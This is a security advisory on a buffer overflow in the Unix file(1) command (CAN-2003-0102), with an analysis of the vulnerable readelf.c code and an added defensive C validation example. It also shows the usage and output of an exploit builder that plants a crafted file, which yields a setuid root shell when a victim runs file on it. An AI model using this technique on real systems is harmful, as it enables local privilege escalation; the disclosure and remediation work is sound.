file(1) is a program used to determine file types by testing each argument in an attempt to classify it.
There are three sets of tests, performed in this order: filesystem tests, magic number tests, and language tests. The first test that succeeds causes the file type to be printed. The magic file usually resides in /usr/share/magic.
A buffer overflow vulnerability allows a user to execute arbitrary commands with the privileges of another user (such as root) by tricking that user into running file on a specially crafted target file.
Credit:
See also: The iDefense Advisory.
Information was provided by iDefense.com and credited to an anonymous user.
Vulnerable versions:
* file Versions 3.40 and below
Immune Versions:
* file Version 3.41 and above
Usage example:
$ file unknown_file
unknown_file: MS-DOS executable (EXE), OS/2 or MS Windows
The attack works when the unsuspecting user tries to run:
$ file [exploit.file]
The crux of the problem lies in the following call to doshn() from
tryelf() on line 587 in readelf.c:
    doshn(class, swap,
          fd,
          getu32(swap, elfhdr.e_shoff),
          getu16(swap, elfhdr.e_shnum),
          getu16(swap, elfhdr.e_shentsize));
The final argument to doshn() 'elfhdr.e_shentsize' is later used in a call
to read() as we see here (line 133 in readelf.c):
if (read(fd, sh_addr, size) == -1)
The call to read() will copy 'size' bytes into the variable 'sh_addr'
which is defined on line 92 in readelf.c:
#define sh_addr (class == ELFCLASS32 \
                 ? (void *) &sh32 \
                 : (void *) &sh64)
The storage buffer used in the call to read() is 0x20 (32) bytes; by supplying a 'size' of 0x28 (40), a stack overflow occurs that overwrites the stored frame pointer (EBP) and instruction pointer (EIP), giving the attacker control of the CPU and the ability to execute arbitrary code.
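The defect above is that the copy length comes straight from the untrusted e_shentsize field while the destination is a fixed-size stack structure. The following C program is an added example, not code from file(1) or from the iDefense advisory: it parses a little-endian ELF header from a memory image and refuses to copy a section header unless e_shentsize equals the size of the structure it would be copied into, and it additionally bounds-checks e_shoff against the image (a step beyond what the advisory discusses). The function names elf_shentsize_ok(), load_first_shdr(), build_sample32() and the sample helpers, as well as the sample image itself, are constructed for this example; the section header layouts follow the ELF specification.

```c
/* Added example (not file(1)'s own code): validate e_shentsize before
 * copying a section header into a fixed-size buffer. Little-endian only.
 * All names below are hypothetical, made up for this example. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define EI_CLASS    4
#define EI_DATA     5
#define ELFCLASS32  1
#define ELFCLASS64  2
#define ELFDATA2LSB 1

/* Section header layouts as given in the ELF specification. */
typedef struct {
    uint32_t sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size;
    uint32_t sh_link, sh_info, sh_addralign, sh_entsize;
} Shdr32;
typedef struct {
    uint32_t sh_name, sh_type;
    uint64_t sh_flags, sh_addr, sh_offset, sh_size;
    uint32_t sh_link, sh_info;
    uint64_t sh_addralign, sh_entsize;
} Shdr64;

static uint16_t get16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t get32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* 1 if e_shentsize matches the class's section header size, 0 if it does
 * not, -1 if the image is too short, not ELF, big-endian or of unknown class. */
int elf_shentsize_ok(const uint8_t *img, size_t len)
{
    if (len < 52 || memcmp(img, "\x7f" "ELF", 4) != 0) return -1;
    if (img[EI_DATA] != ELFDATA2LSB) return -1;
    switch (img[EI_CLASS]) {
    case ELFCLASS32: return get16(img + 46) == sizeof(Shdr32);   /* e_shentsize at 46 */
    case ELFCLASS64: if (len < 64) return -1;
                     return get16(img + 58) == sizeof(Shdr64);   /* e_shentsize at 58 */
    default:         return -1;
    }
}

/* Copy the first section header into a fixed-size structure. The copy length
 * is the structure size, never the untrusted e_shentsize, and e_shoff is
 * checked against the image length. Returns 0 on success, -1 if rejected. */
int load_first_shdr(const uint8_t *img, size_t len, Shdr32 *out32, Shdr64 *out64)
{
    if (elf_shentsize_ok(img, len) != 1) return -1;
    if (img[EI_CLASS] == ELFCLASS32) {
        uint32_t shoff = get32(img + 32);                         /* e_shoff at 32 */
        if (shoff > len || len - shoff < sizeof(Shdr32)) return -1;
        memcpy(out32, img + shoff, sizeof(Shdr32));
    } else {
        uint64_t shoff = get32(img + 40) | ((uint64_t)get32(img + 44) << 32); /* e_shoff at 40 */
        if (shoff > len || len - shoff < sizeof(Shdr64)) return -1;
        memcpy(out64, img + shoff, sizeof(Shdr64));
    }
    return 0;
}

/* Constructed sample: a 52-byte ELF32 little-endian header followed by one
 * 40-byte section header at offset 52 (sh_type = 3). The caller chooses the
 * e_shentsize value planted in the header. Returns the image length. */
size_t build_sample32(uint8_t *buf, size_t cap, uint16_t shentsize)
{
    if (cap < 92) return 0;
    memset(buf, 0, 92);
    memcpy(buf, "\x7f" "ELF", 4);
    buf[EI_CLASS] = ELFCLASS32;
    buf[EI_DATA]  = ELFDATA2LSB;
    buf[6]  = 1;                              /* EI_VERSION */
    buf[32] = 52;                             /* e_shoff = 52 */
    buf[40] = 52;                             /* e_ehsize */
    buf[46] = (uint8_t)(shentsize & 0xff);    /* e_shentsize, low byte */
    buf[47] = (uint8_t)(shentsize >> 8);      /* e_shentsize, high byte */
    buf[48] = 1;                              /* e_shnum */
    buf[52 + 4] = 3;                          /* sh_type of the one section */
    return 92;
}

/* Scenario helpers: build a sample with the given e_shentsize and run the checks. */
int sample_check(uint16_t shentsize)
{
    uint8_t img[128];
    return elf_shentsize_ok(img, build_sample32(img, sizeof img, shentsize));
}
int sample_load(uint16_t shentsize)
{
    uint8_t img[128]; Shdr32 s32 = {0}; Shdr64 s64 = {0};
    return load_first_shdr(img, build_sample32(img, sizeof img, shentsize), &s32, &s64);
}
uint32_t sample_first_sh_type(uint16_t shentsize)
{
    uint8_t img[128]; Shdr32 s32 = {0}; Shdr64 s64 = {0};
    if (load_first_shdr(img, build_sample32(img, sizeof img, shentsize), &s32, &s64) != 0)
        return 0xffffffffu;
    return s32.sh_type;
}

int main(void)
{
    printf("e_shentsize 40    -> check %d, load %d\n", sample_check(40), sample_load(40));
    printf("e_shentsize 65535 -> check %d, load %d\n", sample_check(0xffff), sample_load(0xffff));
    return 0;
}
```

The honest header (e_shentsize 40) passes both checks and the section header is copied; a header carrying any other e_shentsize is rejected before a single byte reaches the stack structure, which is the property the quoted read() call lacked.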
Exploit code:
First, create the file intended for the exploit:
$ ./mkfile_expl -C /tmp/suid -F /tmp/exploit -O "ASCII text" -R /bin/bash -p 1
Local /usr/bin/file upto v3.39 exploit by anonymous
Using PRESET: 1 [Linux file <= 3.38 ]
Using FILENAME: /tmp/exploit
Using REAL_SHELL: /bin/bash
Using CREATED_SHELL: /tmp/suid
Using OUTPUT: ASCII text
Using RET_ADDR: 0xbfffc3f0
Using NOP_COUNT: 6000
Exploit created -> /tmp/exploit
Time to wait till somebody starts /usr/bin/file /tmp/exploit
Once the tainted file has been generated the attacker must wait for or coerce another user to examine the file with the file(1) command.
# ls -l exploit
-rwxr-xr-x 1 farmer farmer 6406 Jan 11 22:07 exploit
# file exploit
/tmp/exploit: ASCII text
The file(1) command reports that the examined file is "ASCII text", as the attacker specified when creating the exploit file. At this point, if the attack was successful, the original attack file (exploit) has been erased and a set-user-id shell has been created:
# ls -l exploit
ls: exploit: No such file or directory
$ ls -l suid
-rwsr-sr-x 1 root root 541096 Jan 11 22:07 suid
CVE:
CVE has assigned this problem the identification: CAN-2003-0102
Solution:
Download the latest file version from the vendor or from:
Version 3.41
Vendors will issue an upgrade individually.